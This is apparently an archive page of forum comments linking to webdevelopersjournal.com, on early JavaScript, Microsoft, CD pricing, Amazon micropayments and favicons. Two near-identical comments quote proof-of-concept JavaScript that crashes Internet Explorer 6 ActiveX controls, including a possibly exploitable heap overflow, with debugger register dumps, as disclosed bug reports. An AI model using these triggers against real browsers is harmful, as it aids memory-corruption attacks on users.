Domain: webdevelopersjournal.com
Stories and comments across the archive that link to webdevelopersjournal.com.
Comments · 9
-
Re:software engineering != computer science
Here's an illustration, from 1999 (4-5 years after we were using JavaScript in class...):
http://www.webdevelopersjournal.com/articles/javascript_limitations.html
That covers some DOM support, but also some basic language stuff -- events, math, objects like function, arguments, array, string... basic stuff that still was wide broken. No mention of exception handling... that's another thing I don't know about support at the time, because we sure weren't using it. -
A short review of Microsoft Security:
I don't know why he is leaving. Being a "Microsoft Security Guru" is apparently a job with no duties. See this movie: 144,000 known viruses for Microsoft operating systems.
It appears to me that Microsoft products are deliberately not secure. Because Microsoft has a temporary monopoly, Microsoft makes more money when its product is more defective.
One of the main purposes of Vista is to get people to buy new computers. Microsoft makes most of its money by selling to computer manufacturers, and Microsoft is able to do what they want, not what is good for the customers. That's the reason Microsoft doesn't fix the bugs in Internet Explorer. When computers become slow because of viruses and spyware, people usually buy a new computer.
If Microsoft cared about its customers, it would fix these bugs in Internet Explorer, and many others:
ADODB.Recordset Filter Property
The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. The interesting thing about this bug is how the same property has to be set three different times to trigger the exception.
a = new ActiveXObject('ADODB.Recordset');
try { a.Filter = "AAAA" } catch(e) { }
try { a.Filter = "AAAA" } catch(e) { }
try { a.Filter = 0x7ffffffe; } catch(e) { }
eax=001dbfdc ebx=02820e18 ecx=02821288
edx=028212a8 esi=02821288 edi=00000000
eip=4de194f7 esp=0013ade8 ebp=0013adf0
msado15!CSysString::operator=+0x12:
4de194f7 3907 cmp [edi],eax ds:0023:00000000=????????
This bug was reported to Microsoft on March 6th, 2006.
Internet.HHCtrl Image Property
The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XPSP2 system. This bug is interesting because a small heap overflow occurs eachtime this property is set. The bug is difficult to detect unless heap verification has been enabled in the global debug flags for iexplore.exe. The demonstration below results in a possibly exploitable heap corruption after128 or more iterations of the property set.
var a = new ActiveXObject("Internet.HHCtrl.1");
var b = unescape("XXXX");
while (b.length < 256) b += b;
for (var i=0; i<4096; i++) {
a['Image'] = b + "";
}
eax=00030288 ebx=00030000 ecx=7ffdd000
edx=00030608 esi=58585850 edi=00000022
eip=7c911f52 esp=0013afcc ebp=0013b1ec
ntdll!RtlAllocateHeap+0x31b:
7c911f52 8a4605 mov al,[esi+0x5] ds:0023:58585855=??
This bug was reported to Microsoft on March 6th, 2006.
StructuredGraphicsControl SourceURL
The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. This bug appears to be triggered by a call to URLOpenBlockingStream() with a NULLpointer referenced by the ppStream argument. The only way I found to trigger this bug is by creating the object through the ActiveXObject interface -- using the standard object/classid syntax (as described here) does not result in a crash.
var a = new ActiveXObject('DirectAnimation.StructuredGraphicsC ontrol');
a.sourceURL = 'CrashingBecauseStreamPtrNotInitialized';
eax=00000000 ebx=7726d35c ecx=02481f30
edx=0013b1a4 esi=00000000 edi=00000000
eip=772ba3bc esp=0013b18c ebp=0013b1b8
urlmon!CBaseBSCB::KickOffDownload+0x7a:
772ba3bc 8b08 mov ecx,[eax] ds:0023:00000000=????????
This bug was reported to Microsoft on March 6th, 2006.
Table.Frameset
The follo -
One of the main purposes of Vista...
In my opinion, one of the main purposes of Vista is to get people to buy new computers. Microsoft makes most of its money by selling to computer manufacturers, so Microsoft does what they want, not what is good for the customers. That's the reason Microsoft doesn't fix the bugs in Internet Explorer. When computers become slow because of viruses and spyware, people usually buy a new computer.
If Microsoft cared about its customers, it would fix these bugs in Internet Explorer, and many others:
ADODB.Recordset Filter Property
The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. The interesting thing about this bug is how the same property has to be set three different times to trigger the exception.
a = new ActiveXObject('ADODB.Recordset');
try { a.Filter = "AAAA" } catch(e) { }
try { a.Filter = "AAAA" } catch(e) { }
try { a.Filter = 0x7ffffffe; } catch(e) { }
eax=001dbfdc ebx=02820e18 ecx=02821288
edx=028212a8 esi=02821288 edi=00000000
eip=4de194f7 esp=0013ade8 ebp=0013adf0
msado15!CSysString::operator=+0x12:
4de194f7 3907 cmp [edi],eax ds:0023:00000000=????????
This bug was reported to Microsoft on March 6th, 2006.
Internet.HHCtrl Image Property
The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. This bug is interesting because a small heap overflow occurs each time this property is set. The bug is difficult to detect unless heap verification has been enabled in the global debug flags for iexplore.exe. The demonstration below results in a possibly exploitable heap corruption after 128 or more iterations of the property set.
var a = new ActiveXObject("Internet.HHCtrl.1");
var b = unescape("XXXX");
while (b.length < 256) b += b;
for (var i=0; i<4096; i++) {
a['Image'] = b + "";
}
eax=00030288 ebx=00030000 ecx=7ffdd000
edx=00030608 esi=58585850 edi=00000022
eip=7c911f52 esp=0013afcc ebp=0013b1ec
ntdll!RtlAllocateHeap+0x31b:
7c911f52 8a4605 mov al,[esi+0x5] ds:0023:58585855=??
This bug was reported to Microsoft on March 6th, 2006.
StructuredGraphicsControl SourceURL
The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. This bug appears to be triggered by a call to URLOpenBlockingStream() with a NULL pointer referenced by the ppStream argument. The only way I found to trigger this bug is by creating the object through the ActiveXObject interface -- using the standard object/classid syntax (as described here) does not result in a crash.
var a = new ActiveXObject('DirectAnimation.StructuredGraphicsC ontrol');
a.sourceURL = 'CrashingBecauseStreamPtrNotInitialized';
eax=00000000 ebx=7726d35c ecx=02481f30
edx=0013b1a4 esi=00000000 edi=00000000
eip=772ba3bc esp=0013b18c ebp=0013b1b8
urlmon!CBaseBSCB::KickOffDownload+0x7a:
772ba3bc 8b08 mov ecx,[eax] ds:0023:00000000=????????
This bug was reported to Microsoft on March 6th, 2006.
Table.Frameset
The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. This bug was found by Aviv Raff using the DOM-Hanoi fuzzer script. DOM-Hanoi works by building trees of every combination of elements up to the specifed depth. An alternate PoC could use plain HTML instead of javascript.
var a = document.createElement('table');
var b = document.createElement('frameset');
a.appendChild(b);
eax=00000000 ebx=01884710 ecx=01886c60
edx=00000027 esi=0013aeb0 edi=01884730
eip=7dc995ad esp=0013a -
I want to propose a toast
I want to propose a toast to the Borland Sidekick, one of the first programs to exploit an undocumented feature of MS-DOS called "Terminate and Stay Resident". While the killer app of the PC revolution is the spreadsheet, this one played a great role too.
Ah, the memoriesf the TSR era ... *sigh* -
Re:A blind web developer...
Maybe you ought to inform the guys that run Web Developers Journal. Tag line: Tips on Web Page Design, HTML, Graphics... Or maybe the guys at Hoover Web Design have no idea what they're talking about either with this:
DEFINITION: A Web developer, strictly speaking, builds and maintains websites. However, a lot of people who create a site from start to finish -- designing graphics and webpages, figuring out the site map, then producing the site -- call themselves Web developers, so it's a confusing term. People who conceptualize and plan out the site are actually Web designers. Developers are the people who use some form of HTML to build the actual pages. A Web developer's other responsibilities could include optimizing graphics for the Web and producing rich media such as Flash, streaming media, or online audio.
I mean, I'm not a web developer (or maybe I am, depending on who's right) so I wouldn't know. -
Re:Give me what I want, not what YOU think I do...Actually, $10 is more revenue than the label itself gets from an individual CD sold in a retail outlet.
If a CD sells for $16, the retailer paid ~$8 to the distributor, who paid the label ~$4. In terms of revenue, the label itself would make roughly the same ducats if the average buyer takes home 2.5 CD/month now.
I believe the reason the labels don't dig on something like this is that part of the way they maintain their oligopoly on the business is by having a lock on distribution (i.e. acess to retail shelves/airwaves). They don't want any significant online music business, because they would very suddenly be on near equal footing with the independants and individual artists. They want to maintain their status quo no matter what. Witness their bank-breaking royalty demands for online netcasts as part of the same strategy.
Of course none of this addresses their marketing muscle...
-
Re:Amazon's Micropayment SCAM...
Here's the scoop, beetsie.
It is called a merchant account.
These individuals could get their own merchant accounts from a PROVIDER and use open-source ecommerce software to automatically receive and process their own credit card payments. Paying only standard card commission fees. What if they don't own their own hardware, bandwidth, staff and capital pixies?If they didn't have their own server, they could use someone virtual server outfit with merchant services support built in, there are hundreds out there, including one from Yahoo Store.
My criticism isn't of the struggling content provider. I recognize their plights. You can bet that what Amazon current charges 15% for, someone else is going to offer for a lot less, and steal away whatever business Amazon does have by telling the various content players that they will process online donations for a fraction of the 15% that Amazon charges. Leaving Amazon yet again to search for a model that makes actual fiscal sense, before they run out of money.
My own business ran credit cards inhouse on a $900 PC running IC Verify with a dialup account ($19.95/a month). It could be run on a $400 PC today.
Amazon has made enough in commissions on Andrew Sullivan alone to pay for that PC and software and the dialup account. for a year. So the rest is gravy.
-
Re:funky icons
Well, the usual place to go is Microsoft's MSDN site, also an article at Web Developer's Journal. When you want to create your icon file, you can drop by favicon.com.
One last thing, there was a bug in the way IE 5 handles a bad favicon.ico file. I don't recall if it was fixed with the "Favorites fix" for IE a while back. More info can be found here. -
Re:Interesting
However, word of mouth on the internet (email especially) is a very powerful force. How else can you explain the Mahir phenomenon?
certain things can gain instant attention. Anybody seen the Hampsterdance? (on the TV *net commercial) or the Mahir you have referred to, featured on the Daily Show, no less. But, for a viable commercial entity this kind of stuff doesn't work. If I start spamming my friends telling them about how great /. is, I doubt the response will be as good as it would be for something like this. E-mail friend marketing is only good for a momentary laugh, not a high-speed million dollar long term Internet business.
And who says the blanket spam/popup/banner ads crap that AOL does are all that effective anyway?
These guys and these guys and these folks, (and others that take more than 15 seconds to find) the basic consensus is that these types of ads work better, but annoy folks. Howver, newbies won't realize that these ads should be annoying, will accept them as normal, and outweigh the clued by a large enough margin that media providers like, oh, say, AOL, can ignore user compaints and keep painting my rare earth elements with crap.
Music is a whole 'nother story, I think we can win that one. And I agree with the big busines imploding idea, IBM is a great example. But, AOL owns ICQ, and Shoutcast, and Winamp (yes, I know about icecast, and *cq and XMMS). I've ranted about this topic enough (check my info page), so I'll stop now.